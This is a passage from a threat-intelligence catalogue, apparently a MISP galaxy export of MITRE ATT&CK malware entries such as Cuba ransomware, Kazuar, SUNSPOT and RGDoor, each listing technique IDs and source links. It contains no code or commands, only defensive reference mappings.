MarkiRAT - S0652 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Clipboard Data - T1115" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="BITS Jobs - T1197" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Shortcut Modification - T1547.009" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Discovery - T1518" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Language Discovery - T1614.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Password Managers - T1555.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

Table 4986. Table References
Links
https://attack.mitre.org/software/S0652
https://securelist.com/ferocious-kitten-6-years-of-covert-surveillance-in-iran/102806/

Cuba - S0625

[Cuba](https://attack.mitre.org/software/S0625) is a Windows-based ransomware family that has been used against financial institutions, technology, and logistics organizations in North and South America as well as Europe since at least December 2019.(Citation: McAfee Cuba April 2021)

The tag is: misp-galaxy:mitre-malware="Cuba - S0625"

Cuba - S0625 is also known as:

Cuba

View relationships graph

Cuba - S0625 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Language Discovery - T1614.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Token Manipulation - T1134" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Service Stop - T1489" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Reflective Code Loading - T1620" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Hidden Window - T1564.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

Table 4987. Table References
Links
https://attack.mitre.org/software/S0625
https://www.mcafee.com/enterprise/en-us/assets/reports/rp-cuba-ransomware.pdf

KGH_SPY - S0526

[KGH_SPY](https://attack.mitre.org/software/S0526) is a modular suite of tools used by [Kimsuky](https://attack.mitre.org/groups/G0094) for reconnaissance, information stealing, and backdoor capabilities. [KGH_SPY](https://attack.mitre.org/software/S0526) derived its name from PDB paths and internal names found in samples containing "KGH".(Citation: Cybereason Kimsuky November 2020)

The tag is: misp-galaxy:mitre-malware="KGH_SPY - S0526"

KGH_SPY - S0526 is also known as:

KGH_SPY
KGH_SPY

View relationships graph

KGH_SPY - S0526 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Discovery - T1518" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Logon Script (Windows) - T1037.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Email Collection - T1114.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Password Stores - T1555" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Credential Manager - T1555.004" with estimative-language:likelihood-probability="almost-certain"

Table 4988. Table References
Links
https://attack.mitre.org/software/S0526
https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite

Kazuar - S0265

[Kazuar](https://attack.mitre.org/software/S0265) is a fully featured, multi-platform backdoor Trojan written using the Microsoft .NET framework. (Citation: Unit 42 Kazuar May 2017)

The tag is: misp-galaxy:mitre-malware="Kazuar - S0265"

Kazuar - S0265 is also known as:

Kazuar

View relationships graph

Kazuar - S0265 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Application Window Discovery - T1010" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Bidirectional Communication - T1102.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Shortcut Modification - T1547.009" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Transfer - T1029" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Video Capture - T1125" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Groups - T1069.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Unix Shell - T1059.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data Destruction - T1485" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Transfer Protocols - T1071.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Internal Proxy - T1090.001" with estimative-language:likelihood-probability="almost-certain"

Table 4989. Table References
Links
https://attack.mitre.org/software/S0265
https://researchcenter.paloaltonetworks.com/2017/05/unit42-kazuar-multiplatform-espionage-backdoor-api-access/

Mosquito - S0256

[Mosquito](https://attack.mitre.org/software/S0256) is a Win32 backdoor that has been used by [Turla](https://attack.mitre.org/groups/G0010). [Mosquito](https://attack.mitre.org/software/S0256) is made up of three parts: the installer, the launcher, and the backdoor. The main backdoor is called CommanderDLL and is launched by the loader program. (Citation: ESET Turla Mosquito Jan 2018)

The tag is: misp-galaxy:mitre-malware="Mosquito - S0256"

Mosquito - S0256 is also known as:

Mosquito

View relationships graph

Mosquito - S0256 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Component Object Model Hijacking - T1546.015" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"

Table 4990. Table References
Links
https://attack.mitre.org/software/S0256
https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf

SUNSPOT - S0562

[SUNSPOT](https://attack.mitre.org/software/S0562) is an implant that injected the [SUNBURST](https://attack.mitre.org/software/S0559) backdoor into the SolarWinds Orion software update framework. It was used by [APT29](https://attack.mitre.org/groups/G0016) since at least February 2020.(Citation: CrowdStrike SUNSPOT Implant January 2021)

The tag is: misp-galaxy:mitre-malware="SUNSPOT - S0562"

SUNSPOT - S0562 is also known as:

SUNSPOT

View relationships graph

SUNSPOT - S0562 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Execution Guardrails - T1480" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Token Manipulation - T1134" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Stored Data Manipulation - T1565.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Compromise Software Supply Chain - T1195.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

Table 4991. Table References
Links
https://attack.mitre.org/software/S0562
https://www.crowdstrike.com/blog/sunspot-malware-technical-analysis/

UPPERCUT - S0275

[UPPERCUT](https://attack.mitre.org/software/S0275) is a backdoor that has been used by [menuPass](https://attack.mitre.org/groups/G0045). (Citation: FireEye APT10 Sept 2018)

The tag is: misp-galaxy:mitre-malware="UPPERCUT - S0275"

UPPERCUT - S0275 is also known as:

UPPERCUT
ANEL

View relationships graph

UPPERCUT - S0275 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"

Table 4992. Table References
Links
https://attack.mitre.org/software/S0275
https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html

VERMIN - S0257

[VERMIN](https://attack.mitre.org/software/S0257) is a remote access tool written in the Microsoft .NET framework. It is mostly composed of original code, but also has some open source code. (Citation: Unit 42 VERMIN Jan 2018)

The tag is: misp-galaxy:mitre-malware="VERMIN - S0257"

VERMIN - S0257 is also known as:

VERMIN

View relationships graph

VERMIN - S0257 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Audio Capture - T1123" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive Collected Data - T1560" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Automated Collection - T1119" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Clipboard Data - T1115" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"

Table 4993. Table References
Links
https://attack.mitre.org/software/S0257
https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/

LookBack - S0582

[LookBack](https://attack.mitre.org/software/S0582) is a remote access trojan written in C++ that was used against at least three US utility companies in July 2019. The TALONITE activity group has been observed using [LookBack](https://attack.mitre.org/software/S0582).(Citation: Proofpoint LookBack Malware Aug 2019)(Citation: Dragos TALONITE)(Citation: Dragos Threat Report 2020)

The tag is: misp-galaxy:mitre-malware="LookBack - S0582"

LookBack - S0582 is also known as:

LookBack

View relationships graph

LookBack - S0582 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Service Stop - T1489" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Non-Application Layer Protocol - T1095" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Shutdown/Reboot - T1529" with estimative-language:likelihood-probability="almost-certain"

Table 4994. Table References
Links
https://attack.mitre.org/software/S0582
https://www.proofpoint.com/us/threat-insight/post/lookback-malware-targets-united-states-utilities-sector-phishing-attacks
https://www.dragos.com/threat/talonite/
https://hub.dragos.com/hubfs/Year-in-Review/Dragos_2020_ICS_Cybersecurity_Year_In_Review.pdf?hsCtaTracking=159c0fc3-92d8-425d-aeb8-12824f2297e8%7Cf163726d-579b-4996-9a04-44e5a124d770

OldBoot - S0285

[OldBoot](https://attack.mitre.org/software/S0285) is an Android malware family. (Citation: HackerNews-OldBoot)

The tag is: misp-galaxy:mitre-malware="OldBoot - S0285"

OldBoot - S0285 is also known as:

OldBoot

View relationships graph

OldBoot - S0285 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Modify OS Kernel or Boot Partition - T1398" with estimative-language:likelihood-probability="almost-certain"

Table 4995. Table References
Links
https://attack.mitre.org/software/S0285
http://thehackernews.com/2014/01/first-widely-distributed-android.html

RGDoor - S0258

[RGDoor](https://attack.mitre.org/software/S0258) is a malicious Internet Information Services (IIS) backdoor developed in the C++ language. [RGDoor](https://attack.mitre.org/software/S0258) has been seen deployed on webservers belonging to the Middle East government organizations. [RGDoor](https://attack.mitre.org/software/S0258) provides backdoor access to compromised IIS servers. (Citation: Unit 42 RGDoor Jan 2018)

The tag is: misp-galaxy:mitre-malware="RGDoor - S0258"

RGDoor - S0258 is also known as:

RGDoor

View relationships graph

RGDoor - S0258 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive via Custom Method - T1560.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="IIS Components - T1505.004" with estimative-language:likelihood-probability="almost-certain"

Table 4996. Table References
Links
https://attack.mitre.org/software/S0258
https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/

Javali - S0528

[Javali](https://attack.mitre.org/software/S0528) is a banking trojan that has targeted Portuguese and Spanish-speaking countries since 2017, primarily focusing on customers of financial institutions in Brazil and Mexico.(Citation: Securelist Brazilian Banking Malware July 2020)

The tag is: misp-galaxy:mitre-malware="Javali - S0528"

Javali - S0528 is also known as:

Javali

View relationships graph

Javali - S0528 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1566.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Msiexec - T1218.007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Binary Padding - T1027.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Dead Drop Resolver - T1102.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"

Table 4997. Table References
Links
https://attack.mitre.org/software/S0528
https://securelist.com/the-tetrade-brazilian-banking-malware/97779/

RCSAndroid - S0295

[RCSAndroid](https://attack.mitre.org/software/S0295) is Android malware. (Citation: TrendMicro-RCSAndroid)

The tag is: misp-galaxy:mitre-malware="RCSAndroid - S0295"

RCSAndroid - S0295 is also known as:

RCSAndroid

View relationships graph

RCSAndroid - S0295 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Access Stored Application Data - T1409" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Alternate Network Mediums - T1438" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Location Tracking - T1430" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture SMS Messages - T1412" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Download New Code at Runtime - T1407" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture Audio - T1429" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture Clipboard Data - T1414" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture Camera - T1512" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1533" with estimative-language:likelihood-probability="almost-certain"

Table 4998. Table References
Links
https://attack.mitre.org/software/S0295
http://blog.trendmicro.com/trendlabs-security-intelligence/hacking-team-rcsandroid-spying-tool-listens-to-calls-roots-devices-to-get-in/

InnaputRAT - S0259

[InnaputRAT](https://attack.mitre.org/software/S0259) is a remote access tool that can exfiltrate files from a victim’s machine. [InnaputRAT](https://attack.mitre.org/software/S0259) has been seen out in the wild since 2016. (Citation: ASERT InnaputRAT April 2018)

The tag is: misp-galaxy:mitre-malware="InnaputRAT - S0259"

